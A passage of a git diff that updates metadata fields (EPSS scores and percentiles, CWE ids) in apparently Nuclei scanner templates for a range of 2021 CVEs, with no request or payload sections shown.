cve-id: CVE-2021-36749
cwe-id: CWE-863
- epss-score: 0.95311
+ epss-score: 0.94684
cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98933
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml
index 7dacbd77d0..813aeba24f 100644
--- a/http/cves/2021/CVE-2021-36873.yaml
+++ b/http/cves/2021/CVE-2021-36873.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00131
cpe: cpe:2.3:a:webence:iq_block_country:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47313
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml
index 76c8aeef89..3da3d82629 100644
--- a/http/cves/2021/CVE-2021-37216.yaml
+++ b/http/cves/2021/CVE-2021-37216.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00106
cpe: cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:*
+ epss-percentile: 0.42468
metadata:
max-request: 1
vendor: qsan
diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml
index 97f41f47f5..3552f160d3 100644
--- a/http/cves/2021/CVE-2021-37304.yaml
+++ b/http/cves/2021/CVE-2021-37304.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-732
epss-score: 0.0101
cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*
+ epss-percentile: 0.81823
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml
index 9d2b9a34e2..b9878c9d47 100644
--- a/http/cves/2021/CVE-2021-37305.yaml
+++ b/http/cves/2021/CVE-2021-37305.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-732
epss-score: 0.00246
cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*
+ epss-percentile: 0.618
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml
index 388d218707..2a262a22fa 100644
--- a/http/cves/2021/CVE-2021-37416.yaml
+++ b/http/cves/2021/CVE-2021-37416.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00118
cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:*
+ epss-percentile: 0.45063
metadata:
max-request: 1
shodan-query: http.title:"ManageEngine"
diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml
index c053856964..719d4c60a5 100644
--- a/http/cves/2021/CVE-2021-37538.yaml
+++ b/http/cves/2021/CVE-2021-37538.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-37538
cwe-id: CWE-89
- epss-score: 0.02629
+ epss-score: 0.02621
cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:*
+ epss-percentile: 0.88974
metadata:
max-request: 1
framework: prestashop
diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml
index d31552d5b4..eec981df1a 100644
--- a/http/cves/2021/CVE-2021-37573.yaml
+++ b/http/cves/2021/CVE-2021-37573.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00303
cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.65782
metadata:
max-request: 1
vendor: tiny_java_web_server_project
diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml
index 20131be658..aa05d80977 100644
--- a/http/cves/2021/CVE-2021-37580.yaml
+++ b/http/cves/2021/CVE-2021-37580.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-37580
cwe-id: CWE-287
- epss-score: 0.93913
+ epss-score: 0.93293
cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.98709
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml
index aeb4f39996..ee72981c2c 100644
--- a/http/cves/2021/CVE-2021-37589.yaml
+++ b/http/cves/2021/CVE-2021-37589.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.0051
cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:*
+ epss-percentile: 0.73614
metadata:
max-request: 3
shodan-query: http.favicon.hash:876876147
diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml
index 8e22523029..05bfadcd38 100644
--- a/http/cves/2021/CVE-2021-37704.yaml
+++ b/http/cves/2021/CVE-2021-37704.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2021-37704
- cwe-id: CWE-668,CWE-200
+ cwe-id: CWE-200,CWE-668
epss-score: 0.00282
cpe: cpe:2.3:a:phpfastcache:phpfastcache:*:*:*:*:*:*:*:*
+ epss-percentile: 0.64484
metadata:
max-request: 2
vendor: phpfastcache
diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml
index 5bdcf1ec06..42076feab4 100644
--- a/http/cves/2021/CVE-2021-37833.yaml
+++ b/http/cves/2021/CVE-2021-37833.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0009
cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.2:*:*:*:*:*:*:*
+ epss-percentile: 0.37259
metadata:
max-request: 4
vendor: digitaldruid
diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml
index a004e7aae0..aed5fc432e 100644
--- a/http/cves/2021/CVE-2021-38314.yaml
+++ b/http/cves/2021/CVE-2021-38314.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-916,CWE-200
epss-score: 0.00153
cpe: cpe:2.3:a:redux:gutenberg_template_library_\&_redux_framework:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.50938
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml
index d0296b6d65..8055278008 100644
--- a/http/cves/2021/CVE-2021-38540.yaml
+++ b/http/cves/2021/CVE-2021-38540.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-38540
cwe-id: CWE-269,CWE-306
- epss-score: 0.00757
+ epss-score: 0.006
cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
+ epss-percentile: 0.75724
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml
index adc54225eb..7754833123 100644
--- a/http/cves/2021/CVE-2021-38647.yaml
+++ b/http/cves/2021/CVE-2021-38647.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-38647
- cwe-id: CWE-665
- epss-score: 0.97478
+ cwe-id: CWE-287
+ epss-score: 0.97445
cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*
+ epss-percentile: 0.99918
metadata:
max-request: 1
vendor: microsoft
diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml
index e5c1fc6fbb..65e460ce81 100644
--- a/http/cves/2021/CVE-2021-38702.yaml
+++ b/http/cves/2021/CVE-2021-38702.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0057
cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.75034
metadata:
max-request: 1
vendor: cyberoamworks
diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml
index 78d55a1e8f..77c68cb035 100644
--- a/http/cves/2021/CVE-2021-38704.yaml
+++ b/http/cves/2021/CVE-2021-38704.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00141
cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:*
+ epss-percentile: 0.49142
metadata:
max-request: 1
shodan-query: http.title:"ClinicCases",html:"/cliniccases/"
diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml
index cf408cd795..94191019b2 100644
--- a/http/cves/2021/CVE-2021-38751.yaml
+++ b/http/cves/2021/CVE-2021-38751.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-116
epss-score: 0.00242
cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.6141
metadata:
max-request: 1
vendor: exponentcms
diff --git a/http/cves/2021/CVE-2021-39141.yaml b/http/cves/2021/CVE-2021-39141.yaml
index 81b7ef2235..b6029df484 100644
--- a/http/cves/2021/CVE-2021-39141.yaml
+++ b/http/cves/2021/CVE-2021-39141.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.5
cve-id: CVE-2021-39141
cwe-id: CWE-434
- epss-score: 0.21811
+ epss-score: 0.15968
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95247
metadata:
max-request: 1
vendor: xstream_project
diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml
index 7c2fcf0132..f81da81227 100644
--- a/http/cves/2021/CVE-2021-39144.yaml
+++ b/http/cves/2021/CVE-2021-39144.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-306,CWE-502
epss-score: 0.97244
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99759
metadata:
max-request: 1
vendor: xstream_project
diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml
index cccd733990..8d669df994 100644
--- a/http/cves/2021/CVE-2021-39146.yaml
+++ b/http/cves/2021/CVE-2021-39146.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.5
cve-id: CVE-2021-39146
cwe-id: CWE-434
- epss-score: 0.21054
+ epss-score: 0.15366
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95168
metadata:
max-request: 1
vendor: xstream_project
diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml
index 339c95f9bc..0dd993e3b6 100644
--- a/http/cves/2021/CVE-2021-39152.yaml
+++ b/http/cves/2021/CVE-2021-39152.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-502
epss-score: 0.00668
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
+ epss-percentile: 0.77147
metadata:
max-request: 1
vendor: xstream_project
diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml
index 5a19370f1b..3b28f7f775 100644
--- a/http/cves/2021/CVE-2021-39165.yaml
+++ b/http/cves/2021/CVE-2021-39165.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2021-39165
cwe-id: CWE-287
- epss-score: 0.026
+ epss-score: 0.02927
cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:*
+ epss-percentile: 0.89509
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml
index c7079b5ca8..fb3cfbb7e4 100644
--- a/http/cves/2021/CVE-2021-39211.yaml
+++ b/http/cves/2021/CVE-2021-39211.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2021-39211
cwe-id: CWE-668,CWE-200
- epss-score: 0.00253
+ epss-score: 0.00208
cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
+ epss-percentile: 0.58059
metadata:
max-request: 2
vendor: glpi-project
diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml
index 50a49576d7..fd1ce9cba8 100644
--- a/http/cves/2021/CVE-2021-39226.yaml
+++ b/http/cves/2021/CVE-2021-39226.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-287
epss-score: 0.9726
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99768
metadata:
max-request: 1
shodan-query: title:"Grafana"
diff --git a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml
index 803d229c08..ac6141fbaa 100644
--- a/http/cves/2021/CVE-2021-39312.yaml
+++ b/http/cves/2021/CVE-2021-39312.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-39312
cwe-id: CWE-22
- epss-score: 0.05109
+ epss-score: 0.05291
cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.92075
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml
index a27e9bc914..13bfe59f99 100644
--- a/http/cves/2021/CVE-2021-39316.yaml
+++ b/http/cves/2021/CVE-2021-39316.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.42316
cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.96839
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml
index 4b28903bb6..a04b846b6a 100644
--- a/http/cves/2021/CVE-2021-39320.yaml
+++ b/http/cves/2021/CVE-2021-39320.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0021
cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.5823
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml
index 9dcb227cf1..8e106e9926 100644
--- a/http/cves/2021/CVE-2021-39322.yaml
+++ b/http/cves/2021/CVE-2021-39322.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00234
cpe: cpe:2.3:a:cybernetikz:easy_social_icons:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.60774
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml
index 39764ebbb3..e56ee445d4 100644
--- a/http/cves/2021/CVE-2021-39327.yaml
+++ b/http/cves/2021/CVE-2021-39327.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-459,CWE-200
epss-score: 0.08547
cpe: cpe:2.3:a:ait-pro:bulletproof_security:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.93622
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml
index 017e5b1a34..d26f11ac5a 100644
--- a/http/cves/2021/CVE-2021-39350.yaml
+++ b/http/cves/2021/CVE-2021-39350.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00104
cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.41813
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml
index 9d0654cdfc..94762bd6c8 100644
--- a/http/cves/2021/CVE-2021-39433.yaml
+++ b/http/cves/2021/CVE-2021-39433.yaml
@@ -15,6 +15,7 @@ info:
cve-id: CVE-2021-39433
epss-score: 0.00902
cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:*
+ epss-percentile: 0.80714
metadata:
max-request: 1
vendor: biqs
diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml
index eaa48af047..3b19fd1634 100644
--- a/http/cves/2021/CVE-2021-39501.yaml
+++ b/http/cves/2021/CVE-2021-39501.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00093
cpe: cpe:2.3:a:eyoucms:eyoucms:1.5.4:*:*:*:*:*:*:*
+ epss-percentile: 0.38821
metadata:
max-request: 1
vendor: eyoucms
diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml
index bc6488ee12..31c3780e16 100644
--- a/http/cves/2021/CVE-2021-40149.yaml
+++ b/http/cves/2021/CVE-2021-40149.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.9
cve-id: CVE-2021-40149
cwe-id: CWE-552
- epss-score: 0.00267
+ epss-score: 0.00689
cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.77586
metadata:
max-request: 1
shodan-query: http.title:"Reolink"
diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml
index 275a262e47..321bb4d8ce 100644
--- a/http/cves/2021/CVE-2021-40150.yaml
+++ b/http/cves/2021/CVE-2021-40150.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-40150
cwe-id: CWE-552
- epss-score: 0.00536
+ epss-score: 0.00892
cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.80593
metadata:
max-request: 1
shodan-query: http.title:"Reolink"
diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml
index c915d274b0..91c7127890 100644
--- a/http/cves/2021/CVE-2021-40323.yaml
+++ b/http/cves/2021/CVE-2021-40323.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-40323
cwe-id: CWE-94
- epss-score: 0.01853
+ epss-score: 0.01788
cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86537
metadata:
max-request: 2
vendor: cobbler_project
diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml
index ad1a842aeb..61d2cb3070 100644
--- a/http/cves/2021/CVE-2021-40438.yaml
+++ b/http/cves/2021/CVE-2021-40438.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9
cve-id: CVE-2021-40438
cwe-id: CWE-918
- epss-score: 0.97544
+ epss-score: 0.97523
cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99978
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml
index 71439498b6..3c0059a518 100644
--- a/http/cves/2021/CVE-2021-40539.yaml
+++ b/http/cves/2021/CVE-2021-40539.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-40539
- cwe-id: CWE-287
- epss-score: 0.97472
+ cwe-id: CWE-706
+ epss-score: 0.97487
cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:*
+ epss-percentile: 0.99953
metadata:
max-request: 4
vendor: zohocorp
diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml
index b829bf007a..9122f13afb 100644
--- a/http/cves/2021/CVE-2021-40542.yaml
+++ b/http/cves/2021/CVE-2021-40542.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-40542
cwe-id: CWE-79
- epss-score: 0.01491
+ epss-score: 0.00643
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76616
metadata:
max-request: 1
shodan-query: http.title:"openSIS"
diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml
index 0a5bf9fe9a..d7e68e0669 100644
--- a/http/cves/2021/CVE-2021-40661.yaml
+++ b/http/cves/2021/CVE-2021-40661.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-40661
cwe-id: CWE-22
- epss-score: 0.00843
+ epss-score: 0.01112
cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:*
+ epss-percentile: 0.82732
metadata:
max-request: 1
google-query: inurl:excalweb.dll
diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml
index 53c05a1dc6..bfeef8d1e6 100644
--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-918
epss-score: 0.6683
cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97493
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml
index 0f4eba8cb1..1c1b48fe58 100644
--- a/http/cves/2021/CVE-2021-40856.yaml
+++ b/http/cves/2021/CVE-2021-40856.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-40856
cwe-id: CWE-706
- epss-score: 0.02169
+ epss-score: 0.02537
cpe: cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.88804
metadata:
max-request: 1
vendor: auerswald
diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml
index a4c9e5f951..48ea3aae68 100644
--- a/http/cves/2021/CVE-2021-40859.yaml
+++ b/http/cves/2021/CVE-2021-40859.yaml
@@ -16,6 +16,7 @@ info:
cve-id: CVE-2021-40859
epss-score: 0.02655
cpe: cpe:2.3:o:auerswald:compact_5500r_firmware:7.8a:build002:*:*:*:*:*:*
+ epss-percentile: 0.89037
metadata:
max-request: 1
fofa-query: '"auerswald"'
diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml
index a0d333a560..85df285e26 100644
--- a/http/cves/2021/CVE-2021-40868.yaml
+++ b/http/cves/2021/CVE-2021-40868.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00264
cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:*
+ epss-percentile: 0.63286
metadata:
max-request: 1
vendor: cloudron
diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml
index df7dc3d447..fa70f7ac7d 100644
--- a/http/cves/2021/CVE-2021-40870.yaml
+++ b/http/cves/2021/CVE-2021-40870.yaml
@@ -14,9 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-40870
- cwe-id: CWE-436
- epss-score: 0.95922
+ cwe-id: CWE-23
+ epss-score: 0.95606
cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99146
metadata:
max-request: 2
vendor: aviatrix
diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml
index 05647786c9..1a048fa349 100644
--- a/http/cves/2021/CVE-2021-40875.yaml
+++ b/http/cves/2021/CVE-2021-40875.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-40875
cwe-id: CWE-425
- epss-score: 0.05046
+ epss-score: 0.04429
cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:*
+ epss-percentile: 0.91335
metadata:
max-request: 2
shodan-query: http.html:"TestRail"
diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml
index 631e0826fc..8303d21d4b 100644
--- a/http/cves/2021/CVE-2021-40908.yaml
+++ b/http/cves/2021/CVE-2021-40908.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-40908
cwe-id: CWE-89
- epss-score: 0.00942
+ epss-score: 0.01192
cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.83381
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2021/CVE-2021-40960.yaml b/http/cves/2021/CVE-2021-40960.yaml
index 78ba6286d6..d1f89aae09 100644
--- a/http/cves/2021/CVE-2021-40960.yaml
+++ b/http/cves/2021/CVE-2021-40960.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-40960
cwe-id: CWE-22
- epss-score: 0.00971
+ epss-score: 0.01168
cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.83172
metadata:
max-request: 1
vendor: galera
diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml
index 94aac67cf4..c518342ed8 100644
--- a/http/cves/2021/CVE-2021-40968.yaml
+++ b/http/cves/2021/CVE-2021-40968.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-40968
cwe-id: CWE-79
- epss-score: 0.00163
+ epss-score: 0.00158
cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.51596
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml
index f518d6ec1f..1cdda3884e 100644
--- a/http/cves/2021/CVE-2021-40969.yaml
+++ b/http/cves/2021/CVE-2021-40969.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-40969
cwe-id: CWE-79
- epss-score: 0.00163
+ epss-score: 0.00158
cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.51596
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml
index 9416eaef98..82d824c580 100644
--- a/http/cves/2021/CVE-2021-40970.yaml
+++ b/http/cves/2021/CVE-2021-40970.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-40970
cwe-id: CWE-79
- epss-score: 0.00163
+ epss-score: 0.00158
cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.51596
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml
index e8ec8beddd..895c242f1d 100644
--- a/http/cves/2021/CVE-2021-40971.yaml
+++ b/http/cves/2021/CVE-2021-40971.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-40971
cwe-id: CWE-79
- epss-score: 0.00163
+ epss-score: 0.00158
cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.51596
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml
index c5ca225bc2..fc341602f5 100644
--- a/http/cves/2021/CVE-2021-40972.yaml
+++ b/http/cves/2021/CVE-2021-40972.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-40972
cwe-id: CWE-79
- epss-score: 0.00163
+ epss-score: 0.00158
cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.51596
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml
index 1a68b2596c..fc80b21289 100644
--- a/http/cves/2021/CVE-2021-40973.yaml
+++ b/http/cves/2021/CVE-2021-40973.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-40973
cwe-id: CWE-79
- epss-score: 0.00163
+ epss-score: 0.00158
cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.51596
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml
index f37c68aeb3..d9c990e2a4 100644
--- a/http/cves/2021/CVE-2021-40978.yaml
+++ b/http/cves/2021/CVE-2021-40978.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.04273
cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:*
+ epss-percentile: 0.91189
metadata:
max-request: 1
vendor: mkdocs
diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml
index 9292b34a3c..68be01e7a1 100644
